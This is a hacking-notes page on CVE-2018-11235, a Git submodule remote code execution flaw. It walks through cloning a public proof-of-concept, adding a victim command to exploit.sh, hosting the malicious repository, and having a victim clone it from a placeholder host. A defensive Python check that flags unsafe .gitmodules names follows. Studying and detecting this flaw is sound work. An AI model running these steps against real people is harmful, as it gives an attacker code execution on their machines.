CVE-2018-11235: Git Submodule RCE

This vulnerability can be used to target clients that clone a remote repository. It has been covered in detail in the following blog post.

Danger: GitHub and GitLab have put protections in place to prevent people from creating a malicious repository on their services. Therefore, you will need to host your own Git repository to exploit this issue.

Creating Repo (Using a Script)

  1. Clone the repository:
     git clone https://github.com/Rezy-Dev/CVE-2018-11235
     cd CVE-2018-11235
  2. Edit exploit.sh and put in the command you want to run on the victim.
  3. Run the script. When it finishes, serve the PoC repo with an apache2 server.

  4. The victim then clones it, for example:
     git clone --recurse-submodules http://vps-ip/malicious.git

The payload command should execute.
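
A defensive check for this issue, as an added example that is not part of the original page or of git itself: it reads the text of a .gitmodules file and flags submodule names that are empty or contain ".." as a path component, which is the rule git's fix for CVE-2018-11235 enforces on submodule names. The function names and the sample file are constructed for illustration.

```python
import re

# Constructed sample .gitmodules (not from the page). The second and third
# names use '..' as a path component; the third uses escaped backslashes.
SAMPLE = r'''[submodule "libs/ui"]
	path = libs/ui
	url = https://example.com/ui.git
[submodule "../../outside"]
	path = vendor/a
	url = https://example.com/a.git
[submodule "a\\..\\b"]
	path = vendor/b
	url = https://example.com/b.git
'''

# Section header such as: [submodule "name"]; \" and \\ are escapes inside the quotes.
_HEADER = re.compile(r'^\s*\[submodule\s+"((?:[^"\\]|\\.)*)"\s*\]', re.IGNORECASE)


def submodule_names(gitmodules_text):
    """Return the submodule names declared in the text of a .gitmodules file."""
    names = []
    for line in gitmodules_text.splitlines():
        match = _HEADER.match(line)
        if match:
            # Undo config escaping: a backslash makes the next character literal.
            names.append(re.sub(r'\\(.)', r'\1', match.group(1)))
    return names


def is_unsafe_name(name):
    """True for an empty name or one with '..' as a path component
    ('/' and '\\' both count as separators, on every platform)."""
    return not name or ".." in re.split(r'[/\\]', name)


def audit(gitmodules_text):
    """Return the declared submodule names that the fixed name check rejects."""
    return [n for n in submodule_names(gitmodules_text) if is_unsafe_name(n)]


if __name__ == "__main__":
    for bad in audit(SAMPLE):
        print("unsafe submodule name:", bad)
```

Run it against the .gitmodules of a repository fetched without --recurse-submodules before initialising any submodules; a non-empty result means the repository should not be trusted.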